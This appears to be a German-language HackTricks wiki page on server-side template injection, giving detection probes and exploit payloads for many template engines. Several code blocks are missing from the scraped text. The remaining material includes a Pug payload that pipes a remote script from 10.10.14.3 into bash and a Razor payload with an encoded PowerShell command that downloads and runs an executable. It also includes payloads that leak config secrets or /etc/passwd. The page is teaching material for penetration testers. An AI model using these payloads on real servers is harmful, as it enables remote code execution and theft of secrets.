SSTI (Server Side Template Injection)
Last updated
Last updated
https://miro.medium.com/v2/resize:fit:640/format:webp/1*3RO051EgizbEer-mdHD8Kg.jpeLernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
RootedCON ist die relevanteste Cybersecurity-Veranstaltung in Spanien und eine der wichtigsten in Europa. Mit der Mission, technisches Wissen zu fördern, ist dieser Kongress ein brodelnder Treffpunkt für Technologie- und Cybersecurity-Profis in jeder Disziplin.
Server-Side Template Injection ist eine Schwachstelle, die auftritt, wenn ein Angreifer schädlichen Code in eine Vorlage injizieren kann, die auf dem Server ausgeführt wird. Diese Schwachstelle kann in verschiedenen Technologien gefunden werden, einschließlich Jinja.
Jinja ist eine beliebte Template-Engine, die in Webanwendungen verwendet wird. Lassen Sie uns ein Beispiel betrachten, das einen anfälligen Code-Snippet mit Jinja demonstriert:
In diesem anfälligen Code wird der name
-Parameter aus der Benutzeranfrage direkt mit der render
-Funktion in die Vorlage eingefügt. Dies kann einem Angreifer potenziell ermöglichen, schädlichen Code in den name
-Parameter einzufügen, was zu einer Server-seitigen Template-Injection führt.
Zum Beispiel könnte ein Angreifer eine Anfrage mit einem Payload wie diesem erstellen:
Der Payload {{bad-stuff-here}}
wird in den name
-Parameter injiziert. Dieser Payload kann Jinja-Template-Direktiven enthalten, die es dem Angreifer ermöglichen, unbefugten Code auszuführen oder die Template-Engine zu manipulieren, wodurch potenziell die Kontrolle über den Server erlangt wird.
Um Server-seitige Template-Injection-Schwachstellen zu verhindern, sollten Entwickler sicherstellen, dass Benutzereingaben ordnungsgemäß bereinigt und validiert werden, bevor sie in Templates eingefügt werden. Die Implementierung von Eingabevalidierung und die Verwendung kontextsensitiver Escape-Techniken können helfen, das Risiko dieser Schwachstelle zu mindern.
Um Server-Side Template Injection (SSTI) zu erkennen, ist zunächst Fuzzing des Templates ein einfacher Ansatz. Dies beinhaltet das Injizieren einer Sequenz von Sonderzeichen (${{<%[%'"}}%\
) in das Template und das Analysieren der Unterschiede in der Serverantwort auf reguläre Daten im Vergleich zu diesem speziellen Payload. Anzeichen für Schwachstellen sind:
Ausgelöste Fehler, die die Schwachstelle und potenziell die Template-Engine offenbaren.
Abwesenheit des Payloads in der Reflexion oder Teile davon fehlen, was darauf hindeutet, dass der Server es anders verarbeitet als reguläre Daten.
Plaintext-Kontext: Unterscheidung von XSS, indem überprüft wird, ob der Server Template-Ausdrücke auswertet (z. B. {{7*7}}
, ${7*7}
).
Code-Kontext: Bestätigung der Schwachstelle durch Ändern der Eingabeparameter. Zum Beispiel das Ändern von greeting
in http://vulnerable-website.com/?greeting=data.username
, um zu sehen, ob die Serverausgabe dynamisch oder fest ist, wie in greeting=data.username}}hello
, das den Benutzernamen zurückgibt.
Die Identifizierung der Template-Engine erfolgt durch die Analyse von Fehlermeldungen oder manuelles Testen verschiedener sprachspezifischer Payloads. Häufige Payloads, die Fehler verursachen, sind ${7/0}
, {{7/0}}
und <%= 7/0 %>
. Die Beobachtung der Serverantwort auf mathematische Operationen hilft, die spezifische Template-Engine zu bestimmen.
Weitere Informationen unter https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756
ein effizienter SSTI + CSTI-Scanner, der neuartige Polyglots nutzt.
eine interaktive Tabelle, die die effizientesten Template-Injection-Polyglots sowie die erwarteten Antworten der 44 wichtigsten Template-Engines enthält.
In dieser Wortliste finden Sie definierte Variablen in den Umgebungen einiger der unten genannten Engines:
Java - Grundlegende Injection
Java - Abrufen der Umgebungsvariablen des Systems
Java - Abrufen von /etc/passwd
Sie können Ihre Payloads unter https://try.freemarker.apache.org ausprobieren.
{{7*7}} = {{7*7}}
${7*7} = 49
#{7*7} = 49 -- (legacy)
${7*'7'} Nichts
${foobar}
Freemarker - Sandbox-Umgehung
⚠️ funktioniert nur mit Freemarker-Versionen unter 2.3.30
Mehr Informationen
Im FreeMarker-Bereich von https://portswigger.net/research/server-side-template-injection
Mehr Informationen
Im Velocity-Bereich von https://portswigger.net/research/server-side-template-injection
In Thymeleaf ist ein häufiger Test für SSTI-Schwachstellen der Ausdruck ${7*7}
, der auch für diese Template-Engine gilt. Für potenzielle Remote-Code-Ausführung können Ausdrücke wie die folgenden verwendet werden:
SpringEL:
OGNL:
Thymeleaf erfordert, dass diese Ausdrücke innerhalb spezifischer Attribute platziert werden. Allerdings wird expression inlining für andere Template-Standorte unterstützt, unter Verwendung von Syntax wie [[...]]
oder [(...)]
. Daher könnte eine einfache SSTI-Testpayload wie [[${7*7}]]
aussehen.
Die Wahrscheinlichkeit, dass diese Payload funktioniert, ist jedoch im Allgemeinen gering. Die Standardkonfiguration von Thymeleaf unterstützt keine dynamische Template-Generierung; Templates müssen vordefiniert sein. Entwickler müssten ihren eigenen TemplateResolver
implementieren, um Templates aus Strings zur Laufzeit zu erstellen, was ungewöhnlich ist.
Thymeleaf bietet auch expression preprocessing, bei dem Ausdrücke innerhalb doppelter Unterstriche (__...__
) vorverarbeitet werden. Diese Funktion kann beim Aufbau von Ausdrücken genutzt werden, wie in der Dokumentation von Thymeleaf demonstriert:
Beispiel für eine Schwachstelle in Thymeleaf
Betrachten Sie den folgenden Codeausschnitt, der anfällig für Ausnutzung sein könnte:
Dies deutet darauf hin, dass, wenn die Template-Engine diese Eingaben unsachgemäß verarbeitet, dies zu einer Remote-Code-Ausführung führen könnte, die auf URLs wie zugreift:
Mehr Informationen
Filter umgehen
Mehrere Variablen-Ausdrücke können verwendet werden. Wenn ${...}
nicht funktioniert, versuchen Sie #{...}
, *{...}
, @{...}
oder ~{...}
.
Lesen Sie /etc/passwd
Benutzerdefiniertes Skript zur Payload-Generierung
Mehr Informationen
{{ someString.toUPPERCASE() }}
Alte Version von Pebble ( < Version 3.0.9):
Neue Version von Pebble :
Jinjava ist ein Open-Source-Projekt, das von Hubspot entwickelt wurde und unter https://github.com/HubSpot/jinjava/ verfügbar ist.
Jinjava - Befehlsausführung
Behoben durch https://github.com/HubSpot/jinjava/pull/230
Mehr Informationen
{% %}
Anweisungsbegrenzer
{{ }}
Ausdrucksbegrenzer
{# #}
Kommentarbegrenzer
{{ request }}
- com.hubspot.content.hubl.context.TemplateContextRequest@23548206
{{'a'.toUpperCase()}}
- "A"
{{'a'.concat('b')}}
- "ab"
{{'a'.getClass()}}
- java.lang.String
{{request.getClass()}}
- Klasse com.hubspot.content.hubl.context.TemplateContextRequest
{{request.getClass().getDeclaredMethods()[0]}}
- public boolean com.hubspot.content.hubl.context.TemplateContextRequest.isDebug()
Suchen Sie nach "com.hubspot.content.hubl.context.TemplateContextRequest" und entdeckten das Jinjava-Projekt auf Github.
Mehr Informationen
${"aaaa"}
- "aaaa"
${99999+1}
- 100000.
#{7*7}
- 49
${{7*7}}
- 49
${{request}}, ${{session}}, {{faceContext}}
Die Ausdruckssprache (EL) ist ein grundlegendes Merkmal, das die Interaktion zwischen der Präsentationsschicht (wie Webseiten) und der Anwendungslogik (wie verwaltete Beans) in JavaEE erleichtert. Sie wird umfassend in mehreren JavaEE-Technologien verwendet, um diese Kommunikation zu optimieren. Die wichtigsten JavaEE-Technologien, die EL nutzen, sind:
JavaServer Faces (JSF): Verwendet EL, um Komponenten in JSF-Seiten mit den entsprechenden Backend-Daten und -Aktionen zu verbinden.
JavaServer Pages (JSP): EL wird in JSP verwendet, um auf Daten innerhalb von JSP-Seiten zuzugreifen und diese zu manipulieren, was es einfacher macht, Seitenelemente mit den Anwendungsdaten zu verbinden.
Contexts and Dependency Injection for Java EE (CDI): EL integriert sich mit CDI, um eine nahtlose Interaktion zwischen der Webschicht und verwalteten Beans zu ermöglichen, was eine kohärentere Anwendungsstruktur gewährleistet.
Überprüfen Sie die folgende Seite, um mehr über die Ausnutzung von EL-Interpretern zu erfahren:
EL - Expression LanguageDie folgenden Sicherheitsmanager-Umgehungen stammen aus diesem Bericht.
Weitere Informationen unter https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756
RootedCON ist die relevanteste Cybersecurity-Veranstaltung in Spanien und eine der wichtigsten in Europa. Mit der Mission, technisches Wissen zu fördern, ist dieser Kongress ein brodelnder Treffpunkt für Technologie- und Cybersecurity-Profis in jeder Disziplin.
Mehr Informationen
Im Smarty-Bereich von https://portswigger.net/research/server-side-template-injection
{{7*7}} = 49
${7*7} = ${7*7}
{{7*'7'}} = 49
{{1/0}} = Error
{{foobar}} Nothing
Twig - Template-Format
Mehr Informationen
Im Twig und Twig (Sandboxed) Abschnitt von https://portswigger.net/research/server-side-template-injection
Plates ist eine Templating-Engine, die nativ in PHP ist und sich von Twig inspirieren lässt. Im Gegensatz zu Twig, das eine neue Syntax einführt, nutzt Plates nativen PHP-Code in Templates, was es für PHP-Entwickler intuitiv macht.
Controller:
Seitenvorlage:
Layout-Vorlage:
Weitere Informationen
HTML_Template_PHPLIB ist dasselbe wie PHPlib, aber auf Pear portiert.
authors.tpl
authors.php
Mehr Informationen
Weitere Informationen unter https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756
Mehr Informationen
Im Jade-Bereich von https://portswigger.net/research/server-side-template-injection
patTemplate nicht-kompilierender PHP-Templating-Engine, die XML-Tags verwendet, um ein Dokument in verschiedene Teile zu unterteilen.
Mehr Informationen
Path Traversal (mehr Informationen hier).
= Fehler
${7*7} = ${7*7}
Nichts
Mehr Informationen
Template
Beschreibung
Auswerten und Ausgabe rendern
Auswerten und HTML-kodierte Ausgabe rendern
Kommentar
und
Code erlauben (standardmäßig deaktiviert)
= 49
Client-Seite
Server-Seite
Mehr Informationen
#{7*7} = 49
#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('touch /tmp/pwned.txt')}()}
#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('curl 10.10.14.3:8001/s.sh | bash')}()}
Beispiel serverseitige Darstellung
Mehr Informationen
{{7*7}} = 49
{{foo}} = Keine Ausgabe
#{7*7} = #{7*7}
{{console.log(1)}} = Fehler
Mehr Informationen
Weitere Informationen unter https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756
{{7*7}} = {{7*7}}
${7*7} = ${7*7}
<%= 7*7 %> = 49
<%= foobar %> = Fehler
Mehr Informationen
{ 7 * 7 }
Mehr Informationen
Weitere Informationen unter https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756
Schau dir die folgende Seite an, um Tricks über willkürliche Befehlsausführung, die Sandboxes umgeht in Python zu lernen:
Bypass Python sandboxes{{7*7}} = 49
${7*7} = ${7*7}
{{foobar}} = Error
{{7*'7'}} = 7777777
Mehr Informationen
Jinja2 ist eine voll funktionsfähige Template-Engine für Python. Es hat volle Unicode-Unterstützung, eine optionale integrierte sandboxed Ausführungsumgebung, wird weit verbreitet verwendet und ist BSD-lizenziert.
{{7*7}} = Fehler
${7*7} = ${7*7}
{{foobar}} Nichts
{{4*4}}[[5*5]]
{{7*'7'}} = 7777777
{{config}}
{{config.items()}}
{{settings.SECRET_KEY}}
{{settings}}
<div data-gb-custom-block data-tag="debug"></div>
Jinja2 - Vorlagenformat
RCE nicht abhängig von __builtins__
:
Weitere Details, wie man Jinja ausnutzen kann:
Jinja2 SSTIAndere Payloads in https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2
Mehr Informationen
Weitere Informationen unter https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756
@(2+2) <= Erfolg
@() <= Erfolg
@("{{code}}") <= Erfolg
@ <= Erfolg
@{} <= FEHLER!
@{ <= FEHLER!
@(1+2)
@( //C#Code )
@System.Diagnostics.Process.Start("cmd.exe","/c echo RCE > C:/Windows/Tasks/test.txt");
@System.Diagnostics.Process.Start("cmd.exe","/c powershell.exe -enc IABpAHcAcgAgAC0AdQByAGkAIABoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAyAC4AMQAxADEALwB0AGUAcwB0AG0AZQB0ADYANAAuAGUAeABlACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAYQBzAGsAcwBcAHQAZQBzAHQAbQBlAHQANgA0AC4AZQB4AGUAOwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGEAcwBrAHMAXAB0AGUAcwB0AG0AZQB0ADYANAAuAGUAeABlAA==");
Die .NET System.Diagnostics.Process.Start
Methode kann verwendet werden, um jeden Prozess auf dem Server zu starten und somit eine Webshell zu erstellen. Ein Beispiel für eine verwundbare Webanwendung finden Sie unter https://github.com/cnotin/RazorVulnerableApp
Mehr Informationen
<%= 7*7 %>
= 49
<%= "foo" %>
= foo
<%= foo %>
= Nichts
<%= response.write(date()) %>
= <Datum>
Mehr Informationen
Auch wenn es Perl ist, verwendet es Tags wie ERB in Ruby.
<%= 7*7 %> = 49
<%= foobar %> = Fehler
Im Template-Engine von Go kann die Bestätigung seiner Verwendung mit spezifischen Payloads erfolgen:
{{ . }}
: Enthüllt die Datenstruktur-Eingabe. Wenn beispielsweise ein Objekt mit einem Password
-Attribut übergeben wird, könnte {{ .Password }}
es offenbaren.
{{printf "%s" "ssti" }}
: Sollte den String "ssti" anzeigen.
{{html "ssti"}}
, {{js "ssti"}}
: Diese Payloads sollten "ssti" zurückgeben, ohne "html" oder "js" anzuhängen. Weitere Direktiven können in der Go-Dokumentation hier erkundet werden.
XSS Exploitation
Mit dem text/template
-Paket kann XSS einfach sein, indem die Payload direkt eingefügt wird. Im Gegensatz dazu kodiert das html/template
-Paket die Antwort, um dies zu verhindern (z.B. ergibt {{"<script>alert(1)</script>"}}
<script>alert(1)</script>
). Dennoch kann die Template-Definition und -Aufruf in Go diese Kodierung umgehen: {{define "T1"}}alert(1){{end}} {{template "T1"}}
vbnet Copy code
RCE Exploitation
Die RCE-Ausnutzung unterscheidet sich erheblich zwischen html/template
und text/template
. Das text/template
-Modul erlaubt das direkte Aufrufen jeder öffentlichen Funktion (unter Verwendung des „call“-Wertes), was im html/template
nicht erlaubt ist. Die Dokumentation für diese Module ist hier für html/template und hier für text/template.
Für RCE über SSTI in Go können Objektmethoden aufgerufen werden. Wenn das bereitgestellte Objekt beispielsweise eine System
-Methode hat, die Befehle ausführt, kann es wie {{ .System "ls" }}
ausgenutzt werden. Der Zugriff auf den Quellcode ist normalerweise erforderlich, um dies auszunutzen, wie im gegebenen Beispiel:
Mehr Informationen
Überprüfen Sie den Rest von https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection für weitere Exploits. Außerdem finden Sie interessante Tag-Informationen in https://github.com/DiogoMRSilva/websitesVulnerableToSSTI
Wenn Sie denken, dass es nützlich sein könnte, lesen Sie:
RootedCON ist die relevanteste Cybersecurity-Veranstaltung in Spanien und eine der wichtigsten in Europa. Mit der Mission, technisches Wissen zu fördern, ist dieser Kongress ein brodelnder Treffpunkt für Technologie- und Cybersecurity-Profis in jeder Disziplin.
Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)